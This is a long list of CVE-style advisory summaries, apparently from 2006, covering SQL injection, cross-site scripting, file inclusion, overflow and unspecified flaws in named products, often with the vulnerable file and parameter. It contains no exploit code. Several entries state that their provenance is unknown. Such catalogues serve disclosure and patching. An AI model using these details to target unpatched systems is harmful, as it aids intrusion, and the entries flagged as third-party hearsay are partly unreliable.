Unspecified vulnerability in the daemons for Sun N1 Grid Engine 5.3 and N1 Grid Engine 6.0 allows local users to cause a denial of service (grid service shutdown) and possibly execute arbitrary code using buffer overflows via unknown vectors that cause (1) qmaster or (2) execd to terminate.
SQL injection vulnerability in links.php in Gonafish LinksCaffe 3.0 allows remote attackers to execute arbitrary SQL commands via the cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Stack-based buffer overflow in ITIRecorder.MicRecorder ActiveX control in iarecord.dll in InterActual Player before 2.6 allows remote attackers to execute arbitrary code via a long argument to the Files method.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in index.php in phpFaber TopSites 2.0.9 allows remote attackers to inject arbitrary web script or HTML via the i_cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
heartbeat.c in heartbeat before 2.0.6 sets insecure permissions in a shmget call for shared memory, which allows local users to cause an unspecified denial of service via unknown vectors, possibly during a short time window on startup.
PHP remote file inclusion vulnerability in Include/editor/class.rich.php in FlushCMS 1.0.0-pre2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the class_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the sctp_make_abort_user function in the SCTP implementation in Linux 2.6.x before 2.6.17.10 and 2.4.23 up to 2.4.33 allows local users to cause a denial of service (panic) and possibly gain root privileges via unknown attack vectors.
Unspecified vulnerability in JD Edwards HTML Server for Oracle OneWorld Tools EnterpriseOne Tools 8.95 and 8.96 has unknown impact and attack vectors, aka Oracle Vuln# JDE01.
Unspecified vulnerability in PeopleSoft Enterprise Portal for Oracle PeopleSoft Enterprise Portal 8.8 with Enforcer Portal Pack Bundle #10 and 8.9 Bundle #3 has unknown impact and attack vectors, aka Oracle Vuln# PSE02.
Unspecified vulnerability in PeopleSoft Enterprise Portal for Oracle PeopleSoft Enterprise Portal 8.4 Bundle #16, 8.8 Bundle #10, and 8.9 Bundle #3 has unknown impact and attack vectors, aka Oracle Vuln# PSE01.
Multiple unspecified vulnerabilities in Oracle Management Service for Oracle Enterprise Manager 10.1.0.5 and 10.2.0.1 have unknown impact and attack vectors, aka Oracle Vuln# EM03 and EM04.
Unspecified vulnerability in Enterprise Config Management for Oracle Enterprise Manager 10.1.0.3 has unknown impact and attack vectors, aka Oracle Vuln# EM02.
Unspecified vulnerability in CORE: Repository for Oracle Enterprise Manager 9.0.1.0 and 9.2.0.1 has unknown impact and attack vectors, aka Oracle Vuln# EM01.
Multiple unspecified vulnerabilities in Oracle Exchange for Oracle E-Business Suite and Applications 6.2.4 have unknown impact and attack vectors, aka Oracle Vuln# (1) APPS16 and (2) APPS17.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.9 have unknown impact and attack vectors, aka Oracle Vuln# (1) APPS03 and (2) APPS04 for Oracle Application Object Library; and (3) APPS20 for Oracle XML Gateway.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors, aka Oracle Vuln# (1) APPS01 for Internet Expenses; (2) APPS02, (3) APPS05, (4) APPS06, (5) APPS07, (6) APPS08, (7) APPS09, and (8) APPS10 for Oracle Application Object Library; (9) APPS11, (10) APPS12, and (11) APPS13 for Oracle Applications Technology Stack; (12) APPS14 for Oracle Call Center Technology; (13) APPS15 for Oracle Common Applications; (14) APPS18 for Oracle Self-Service Web Applications; and (15) APPS19 for Oracle Workflow Cartridge.
Unspecified vulnerability in Calendar for Oracle Collaboration Suite 10.1.2 has unknown impact and attack vectors, aka Oracle Vuln# OCS01.
Unspecified vulnerability in OC4J for Oracle Application Server 10.1.2.0.2 and 10.1.2.1 has unknown impact and attack vectors, aka Oracle Vuln# AS10.
Unspecified vulnerability in OC4J for Oracle Application Server 10.1.3.0 has unknown impact and attack vectors, aka Oracle Vuln# AS09.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.4.2 and 10.1.2.0.0 has unknown impact and attack vectors, aka Oracle Vuln# AS07.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3, 9.0.3.1, and 9.0.4.1 has unknown impact and attack vectors, aka Oracle Vuln# AS06.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3, 9.0.3.1, 9.0.4.2, and 10.1.2.0.0 has unknown impact and attack vectors, aka Oracle Vuln# (1) AS05 and (2) AS08.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3, 9.0.3.1, and 10.1.2.0.0 has unknown impact and attack vectors, aka Oracle Vuln# AS04.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3, 9.0.3.1, 9.0.4.2, 10.1.2.0.2, and 10.1.2.1 has unknown impact and attack vectors, aka Oracle Vuln# AS03.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3 and 9.0.3.1 has unknown impact and attack vectors, aka Oracle Vuln# AS02.
Unspecified vulnerability in OC4J for Oracle Application Server 9.0.2.3 has unknown impact and attack vectors, aka Oracle Vuln# AS01.
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB21 for Statistics and (2) DB22 for Upgrade &amp; Downgrade.  NOTE: as of 20060719, Oracle has not disputed a claim by a reliable researcher that DB21 is for a local SQL injection vulnerability in SYS.DBMS_STATS, and that DB22 is for SQL injection in SYS.DBMS_UPGRADE.
Unspecified vulnerability in the Oracle ODBC Driver for Oracle Database 10.1.0.4 has unknown impact and attack vectors, aka Oracle Vuln# 10.1.0.4.
Unspecified vulnerability in InterMedia for Oracle Database 9.0.1.5, 9.2.0.6, and 10.1.0.4 has unknown impact and attack vectors, aka oracle Vuln# DB07.
Multiple unspecified vulnerabilities in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB06 in Export; (2) DB08, (3) DB09, (4) DB10, (5) DB11, (6) DB12, (7) DB13, (8) DB14, and (9) DBC01 for OCI; (10) DB16 for Query Rewrite/Summary Mgmt; (11) DB17, (12) DB18, (13) DB19, (14) DBC02, (15) DBC03, and (16) DBC04 for RPC; and (17) DB20 for Semantic Analysis.  NOTE: as of 20060719, Oracle has not disputed third party claims that DB06 is related to "SQL injection" using DBMS_EXPORT_EXTENSION with a modified ODCIIndexGetMetadata routine and a call to GET_DOMAIN_INDEX_METADATA, in which case DB06 might be CVE-2006-2081.
Unspecified vulnerability in the Dictionary component in Oracle Database 8.1.7.4, 9.0.1.5, and 9.2.0.6 has unknown impact and attack vectors, aka Oracle Vuln# DB05.
Multiple unspecified vulnerabilities in Oracle Database 9.2.0.6 and 10.1.0.4 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB04 for Web Distributed Authoring and Versioning (DAV) and (2) DB23 for XMLDB.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5 and 9.2.0.6 has unknown impact and attack vectors, aka Oracle Vuln# DB02.
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB01 for Change Data Capture (CDC) component and (2) DB03 for Data Pump Metadata API.  NOTE: as of 20060719, Oracle has not disputed a claim by a reliable researcher that DB01 is related to multiple SQL injection vulnerabilities in SYS.DBMS_CDC_IMPDP using the (a) IMPORT_CHANGE_SET, (b) IMPORT_CHANGE_TABLE, (c) IMPORT_CHANGE_COLUMN, (d) IMPORT_SUBSCRIBER, (e) IMPORT_SUBSCRIBED_TABLE, (f) IMPORT_SUBSCRIBED_COLUMN, (g) VALIDATE_IMPORT, (h) VALIDATE_CHANGE_SET, (i) VALIDATE_CHANGE_TABLE, and (j) VALIDATE_SUBSCRIPTION procedures, and that DB03 is for SQL injection in the MAIN procedure for SYS.KUPW$WORKER.
Cross-site request forgery (CSRF) vulnerability in the communicate function in estmaster.c for Hyper Estraier before 1.3.3 allows remote attackers to perform unauthorized actions as other users via unknown vectors.
Unspecified vulnerability in Sybase/Financial Fusion Consumer Banking Suite versions before 20060706 has unknown impact and remote attack vectors.
SquirrelMail 1.4.6 and earlier, with register_globals enabled, allows remote attackers to hijack cookies in src/redirect.php via unknown vectors.  NOTE: while "cookie theft" is frequently associated with XSS, the vendor disclosure is too vague to be certain of this.
Unspecified vulnerability in NIS server on Sun Solaris 8, 9, and 10 allows local and remote attackers to cause a denial of service (ypserv hang) via unknown vectors.
Cross-site scripting (XSS) vulnerability in Index.PHP in CuteNews 1.4.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Microsoft PowerPoint 2003 has unknown impact and user-assisted attack vectors related to powerpnt.exe. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3656, and CVE-2006-3590, although it is possible that they are all different.
Unspecified vulnerability in the SSH dissector in Wireshark (aka Ethereal) 0.9.10 to 0.99.0 allows remote attackers to cause a denial of service (infinite loop) via unknown attack vectors.
Multiple off-by-one errors in Wireshark (aka Ethereal) 0.9.7 to 0.99.0 have unknown impact and remote attack vectors via the (1) NCP NMAS and (2) NDPS dissectors.
SQL injection vulnerability in search.php in SenseSites CommonSense CMS 5.0 allows remote attackers to execute arbitrary SQL commands via the Date parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) "Process name", (2) "Module name", or (3) "API name" fields.
Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Groupmax Collaboration Portal and Web Client before 07-20-/D, and uCosminexus Collaboration Portal and Forum/File Sharing before 06-20-/C, allow remote attackers to "execute malicious scripts" via unknown vectors (aka HS06-014-01).
Unspecified vulnerability in NetApp Data ONTAP 7.0x through 7.0.4P8D9, 7.1x, 7.1.0.1x, and 7.2RC1, RC2, and RC3, as used in IBM N series Filers and other products, allows unauthorized users to gain access to privileged commands via unknown vectors, probably related to incorrect capabilities with the audit role.
** DISPUTED **
Direct static code injection vulnerability in code/class_db_text.php in EJ3 TOPo 2.2.178 and earlier allows remote attackers to execute arbitrary PHP code via parameters such as (1) descripcion and (2) pais, which are stored directly in a PHP script.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports.
Microsoft Internet Explorer 6.0 and 6.0 SP1 allows remote attackers to cause a denial of service via an HTML page with an A tag containing a long title attribute.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the custom tag support for the TIFF library (libtiff) before 3.8.2 allows remote attackers to cause a denial of service (instability or crash) and execute arbitrary code via unknown vectors.
Heap-based buffer overflow in the NeXT RLE decoder in the TIFF library (libtiff) before 3.8.2 might allow context-dependent attackers to execute arbitrary code via unknown vectors involving decoding large RLE images.
Heap-based buffer overflow in the PixarLog decoder in the TIFF library (libtiff) before 3.8.2 might allow context-dependent attackers to execute arbitrary code via unknown vectors.
Buffer overflow in Adobe Acrobat 6.0 to 6.0.4 allows remote attackers to execute arbitrary code via unknown vectors in a document that triggers the overflow when it is distilled to PDF.
Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability."
Cross-site scripting (XSS) vulnerability in TigerTom TTCalc 1.0 allows remote attackers to inject arbitrary web script or HTML via the currency parameter in (1) loan.php and (2) mortgage.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in editpost.php in MyBulletinBoard (MyBB) before 1.1.5 allows remote attackers to perform unauthorized actions as a logged in user and delete arbitrary forum posts via a bbcode IMG tag with a modified delete parameter in a deletepost action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the directory server (dirserver) in Tor before 0.1.1.20 allows remote attackers to cause an unspecified denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover within a URL.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports.
Unspecified vulnerability in mkdir in HP-UX B.11.00, B.11.04, B.11.11, and B.11.23 allows local users to gain privileges via unknown attack vectors.
Directory traversal vulnerability in QuickZip 3.06.3 allows remote user-assisted attackers to overwrite arbitrary files or directories via .. (dot dot) sequences in filenames within (1) TAR,(2) GZ, and (3) JAR archives.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the wpprop code for Project EROS bbsengine before 20060622-0315 has unknown impact and remote attack vectors via [img] tags, possibly cross-site scripting (XSS).
Cross-site scripting (XSS) vulnerability in the preparestring function in lib/common.php in Project EROS bbsengine before 20060501-0142-jam, and possibly earlier versions dating back to 2006-02-23, might allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
PHP remote file inclusion vulnerability in mod_cbsms.php in CBSMS Mambo Module 1.0 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosC_a_path parameter.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in error.php in UebiMiau Webmail 2.7.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the icq parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in menu.php in Some Chess 1.5 rc2 allows remote attackers to conduct actions as another user, such as changing usernames and passwords, via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in cms_admin.php in THoRCMS 1.3.1 allows remote attackers to execute arbitrary SQL commands via multiple unspecified parameters, such as the add_link_mid parameter.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in show.php in GL-SH Deaf Forum 6.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) page, and (3) action parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM WebSphere Application Server before 6.0.2.11 has unknown impact and attack vectors because the "UserNameToken cache was improperly used."
Cross-site scripting (XSS) vulnerability in Sun ONE Application Server 7 before Update 9, Java System Application Server 7 2004Q2 before Update 5, and Java System Application Server Enterprise Edition 8.1 2005 Q1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors.
Cross-site scripting (XSS) vulnerability in sign.php in cjGuestbook 1.3 and earlier allows remote attackers to inject web script or HTML via the (1) name, (2) email, (3) add, and (4) wName parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the kernel in HP-UX B.11.00, B.11.11, and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.
Multiple SQL injection vulnerabilities in Sharky e-shop 3.05 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) maingroup and (2) secondgroup parameters to (a) search_prod_list.asp, and the (3) maingroup parameter to (b) meny2.asp.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in CMS Faethon 1.3.2 allow remote attackers to inject arbitrary web script or HTML via the mainpath parameter to (1) data/footer.php and (2) admin/header.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL in the (1) path[cb] parameter to (a) libraries/comment/postComment.php and (b) modules/poll/poll.php, (2) rel parameter to (c) modules/archive/overview.inc.php, and the (3) actualModuleDir parameter to (d) modules/forum/showThread.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Support Tools Manager (xstm, cstm, and stm) on HP-UX B.11.11 and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.
Multiple unspecified vulnerabilities in Adobe Acrobat Reader (acroread) before 7.0.8 have unknown impact and unknown vectors.
PhpMyFactures 1.2 and earlier allows remote attackers to bypass authentication and modify data via direct requests with modified parameters to (1) /tva/ajouter_tva.php, (2) /remises/ajouter_remise.php, (3) /pays/ajouter_pays.php, (4) /pays/modifier_pays.php, (5) /produits/ajouter_cat.php, (6) /produits/ajouter_produit.php, (7) /clients/ajouter_client.php, (8) /clients/modifier_client.php.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Car Classifieds allows remote attackers to inject arbitrary web script or HTML via the make_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in Event Registration allows remote attackers to inject arbitrary web script or HTML via the (1) event_id parameter to view-event-details.php or (2) select_events parameter to event-registration.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in TikiWiki 1.9.3.2 and possibly earlier versions allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in TikiWiki 1.9.3.2 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in addwords.php in MyScrapbook 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) comment parameters.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in Cal.PHP3 in Chris Lea Lucid Calendar 0.22 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the session extension functionality in PHP before 5.1.3 has unknown impact and attack vectors related to heap corruption.
Unspecified vulnerability in session.c in PHP before 5.1.3 has unknown impact and attack vectors, related to "certain characters in session names," including special characters that are frequently associated with CRLF injection, SQL injection, cross-site scripting (XSS), and HTTP response splitting vulnerabilities.  NOTE: while the nature of the vulnerability is unspecified, it is likely that this is related to a violation of an expectation by PHP applications that the session name is alphanumeric, as implied in the PHP manual for session_name().
Multiple SQL injection vulnerabilities in Dominios Europa PICRATE (aka TAL RateMyPic) 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) id, (2) voteid, and (3) vfiel parameters to (a) index.php, and via the (4) nick, (5) email, (6) city, (7) messen, and (8) message form field parameters to (b) add.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in Enterprise Timesheet and Payroll Systems (EPS) 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter in cal.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in vs_search.php in Arantius Vice Stats before 1.0.1 allows remote attackers to execute arbitrary SQL commands via unknown vectors, a different issue than CVE-2006-2972.
SQL injection vulnerability in block_forum_topic_new.php in ViArt Shop Free 2.5.5, and possibly other distributions including Light, Standard, and Enterprise, might allow remote attackers to execute arbitrary SQL commands via unknown vectors, probably involving the forum_id parameter.
Unspecified vulnerability in usermgr.php in Coppermine Photo Gallery before 1.4.7 has unknown impact and remote attack vectors, possibly related to authorization/authentication errors.
Stack-based buffer overflow in CesarFTP 0.99g and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MKD command.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Directory traversal vulnerability in FilZip 3.05 allows remote attackers to write arbitrary files via a .. (dot dot) in a (1) .rar, (2) .tar, (3) .jar, or (4) .gz file.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in i.List 1.5 beta and earlier allows remote attackers to inject arbitrary web script or HTML via the banurl parameter to add.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the user profile change functionality in DokuWiki, when Access Control Lists are enabled, allows remote authenticated users to read unauthorized files via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in post.asp in CodeAvalanche FreeForum (aka CAForum) 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_subject and (2) msg_body parameters.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in cat.php in PHP Pro Publish 2.0 allows remote attackers to inject arbitrary web script or HTML via the catname parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in OSADS Alliance Database before 1.4 has unknown impact and attack vectors related to a "Security Leak to lock in HTML-Code," possibly due to a cross-site scripting (XSS) vulnerability involving comments.
Cross-site scripting (XSS) vulnerability in hava.asp in Enigma Haber 4.2 allows remote attackers to inject arbitrary web script or HTML via the il parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the CHM unpacker in avast! before 4.7.844 has unknown impact and remote attack vectors.
ActiveState ActivePerl 5.8.8.817 for Windows configures the site/lib directory with "Users" group permissions for changing files, which allows local users to gain privileges by creating a malicious sitecustomize.pl file in that directory.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Print.PHP in VisionGate Portal System allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors.  NOTE: By default, the connections are only allowed from the local host.
SQL injection vulnerability in bolum.php in tekno.Portal allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in the (1) vGetPost and (2) main functions in easy-scart.c through easy-scart6.c in iShopCart allow remote attackers to execute arbitrary code by sending a large amount of data containing "Submit" in an sslinvoice action, and allow remote attackers to have an unknown impact via a large amount of posted data.
Cross-site scripting (XSS) vulnerability in index.cfm in Goss Intelligent Content Management (iCM) 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party sources.
Cross-site scripting (XSS) vulnerability in content_footer.php in toendaCMS 0.7.0 allows remote attackers to inject arbitrary web scripts or HTML via the print_url variable.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party sources.
Multiple cross-site scripting (XSS) vulnerabilities in XiTi Tracking Script 6 and 7 RC allow remote attackers to inject arbitrary web script or HTML via (1) the xtref parameter in xiti.js and (2) an HTTP Referer header field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
admin/redigera/redigera2.asp in Hogstorps hogstorp Guestbook 2.0 does not verify user credentials, which allows remote attackers to edit arbitrary posts via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in add.asp in Hogstorps hogstorp guestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, and (3) headline parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  It is possible that this is primary to CVE-2006-2678.
SQL injection vulnerability in Hitachi HITSENSER3 HITSENSER3/PRP, HITSENSER3/PUP, HITSENSER3/STP, and HITSENSER3/EUP allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in superalbum/index.php in Photoalbum B&amp;W 1.3 allows remote attackers to inject arbitrary web script or HTML via the gal parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in view_album.php in SelectaPix 1.4 allows remote attackers to execute arbitrary SQL commands via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party sources.
SQL injection vulnerability in Geeklog 1.4.0sr2 and earlier allows remote attackers to execute arbitrary SQL commands via unknown vectors related to story submission.
Multiple unspecified vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to read arbitrary image, HTML, or PHP files via unknown vectors, probably related to directory traversal.
Unspecified "information leakage" vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to access arbitrary images, including dynamically generated images, via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in EVA-Web 2.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) debut_image parameter in (a) article-album.php3, (2) date parameter in (b) rubrique.php3, and the (3) perso and (4) aide parameters to (c) an unknown script, probably index.php.
libs/comverp.c in Courier MTA before 0.53.2 allows attackers to cause a denial of service (CPU consumption) via unknown vectors involving usernames that contain the "=" (equals) character, which is not properly handled during encoding.
Untrusted search path vulnerability in update_flash for IBM AIX 5.1, 5.2 and 5.3 allows local users to execute arbitrary commands via unknown vectors involving lsmcode and possibly other commands.
Stack-based buffer overflow in Symantec Antivirus 10.1 and Client Security 3.1 allows remote attackers to execute arbitrary code via unknown attack vectors.
artmedic newsletter 4.1.2 and possibly other versions, when register_globals is enabled, allows remote attackers to modify arbitrary files and execute arbitrary PHP code via the email parameter to newsletter_log.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in DSChat 1.0 allows remote attackers to execute arbitrary PHP code via the Nickname field, which is not sanitized before creating a file in a user directory.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in e107 before 0.7.5 has unknown impact and remote attack vectors related to an "emailing exploit".
SQL injection vulnerability in e107 before 0.7.5 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
SQL injection vulnerability in Destiney Links Script 2.1.2 allows remote attackers to execute arbitrary SQL commands via the ID parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in post.php in SkyeBox 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) message parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information, although it was likely prompted by a vague announcement from a researcher who incorrectly referred to the product as "SkyeShoutbox."
The editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to execute arbitrary Ruby code via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in Wiki content in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple unspecified vulnerabilities in HP OpenView Network Node Manager (OV NNM) 6.20, 6.4x, 7.01, and 7.50 allow remote attackers to gain privileged access, execute arbitrary commands, or create arbitrary files via unknown vectors.
Unspecified vulnerability in HP OpenView Storage Data Protector 5.1 and 5.5 allows remote attackers to execute arbitrary code via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in Docebo 3.0.3 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in (1) where_cms, (2) where_lms, (3) where_upgrade, (4) BBC_LIB_PATH, and (5) BBC_LANGUAGE_PATH parameters in various unspecified scripts. NOTE: the provenance of some of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in DGBook 1.0, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) homepage, (4) address, (5) comment, and (6) ip parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Florian Amrhein NewsPortal before 0.37, and possibly TR Newsportal (TRanx rebuilded), allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in Jemscripts DownloadControl 1.0 allows remote attackers to inject arbitrary HTML or web script via the dcid parameter to dc.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. This issue appears to be independent from a different issue that involves the same vector.
Unspecified vulnerability in the kernel in HP-UX B.11.00 allows local users to cause an unspecified denial of service via unknown vectors.
Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling.
Multiple SQL injection vulnerabilities in Xtreme Topsites 1.1, with magic_quotes_gpc disabled, allow remote attackers to execute arbitrary SQL commands via the (1) searchthis parameter in lostid.php and (2) id parameter in stats.php.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
SQL injection vulnerability in MyWeb Portal Office, Standard Edition, Public Edition, Medical Edition, Citizen Edition, School Edition, and Light Edition allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
SQL injection vulnerability in Hitachi EUR Professional Edition, EUR Viewer, EUR Print Service, and EUR Print Service for ILF allows remote authenticated users to execute arbitrary SQL commands via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in Sun ONE Web Server 6.0 SP9 and earlier, Java System Web Server 6.1 SP4 and earlier, Sun ONE Application Server 7 Platform and Standard Edition Update 6 and earlier, and Java System Application Server 7 2004Q2 Standard and Enterprise Edition Update 2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving error messages.
Buffer overflow in iMonitor 2.4 in Novell eDirectory 8.8 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in IBM WebSphere Application Server 5.0.2 and earlier, and 5.1.1 and earlier, has unknown impact and attack vectors related to "Inserting certain script tags in urls [that] may allow unintended execution of scripts."
Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and attack vectors related to the "administrative console".
Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and remote attack vectors related to "HTTP request handlers".
